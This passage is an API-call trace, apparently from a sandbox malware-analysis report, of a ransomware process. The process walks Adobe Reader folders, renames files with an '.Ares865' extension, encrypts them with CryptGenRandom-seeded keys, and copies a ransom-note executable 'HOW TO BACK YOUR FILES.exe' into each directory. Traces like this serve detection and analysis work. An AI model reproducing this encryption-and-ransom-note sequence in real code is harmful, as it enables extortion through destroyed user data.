out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env.Ares865") returned 107 [0058.449] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rumphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rumphon.env.ares865"), dwFlags=0x1) returned 1 [0058.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rumphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rumphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.451] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9336) returned 1 [0058.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.451] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.452] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2780, lpName=0x0) returned 0x15c [0058.453] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2780) returned 0x190000 [0058.455] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.455] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.455] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.456] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.456] CloseHandle (hObject=0x15c) returned 1 [0058.456] CloseHandle (hObject=0x118) returned 1 [0058.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.458] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e05c960, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rus.fca", cAlternateFileName="")) returned 1 [0058.458] lstrcmpiW (lpString1="rus.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.458] lstrcmpiW (lpString1="rus.fca", lpString2="aoldtz.exe") returned 1 [0058.458] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env.Ares865") returned 107 [0058.458] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slvphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slvphon.env.ares865"), dwFlags=0x1) returned 1 [0058.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slvphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slvphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.460] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4255) returned 1 [0058.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.460] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.461] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.461] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.461] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x15c [0058.462] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x190000 [0058.463] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.465] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.465] CloseHandle (hObject=0x15c) returned 1 [0058.465] CloseHandle (hObject=0x118) returned 1 [0058.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.466] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dcf09c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn.fca", cAlternateFileName="")) returned 1 [0058.466] lstrcmpiW (lpString1="spn.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.466] lstrcmpiW (lpString1="spn.fca", lpString2="aoldtz.exe") returned 1 [0058.467] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2" [0058.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0058.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.467] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2") returned 76 [0058.467] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2" [0058.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.475] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dcf09c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x545b54c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x545b54c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.475] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.475] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.516] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font" [0058.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0058.516] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font") returned 54 [0058.517] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font" [0058.517] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.517] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.527] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.527] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x546278e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x546278e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.542] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.542] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.547] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM" [0058.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0058.548] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0058.548] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM") returned 58 [0058.548] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM" [0058.548] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.552] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54673ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54673ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.552] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.553] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap" [0058.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0058.553] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap") returned 54 [0058.553] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap" [0058.553] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.553] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.601] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.601] GetLastError () returned 0x0 [0058.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.601] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.601] CloseHandle (hObject=0x118) returned 1 [0058.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.602] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x800a53c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x800a53c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.619] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.619] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.705] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont" [0058.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0058.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0058.705] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont") returned 57 [0058.705] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont" [0058.705] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.705] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.722] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.722] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f934f00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54816ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54816ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.722] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.722] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.722] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader" [0058.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0058.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0058.722] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader") returned 47 [0058.722] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader" [0058.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\how to back your files.exe"), bFailIfExists=1) returned 1 [0058.727] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.727] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54816ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54816ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.727] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.727] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.729] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker" [0058.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0058.729] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker") returned 55 [0058.729] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker" [0058.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 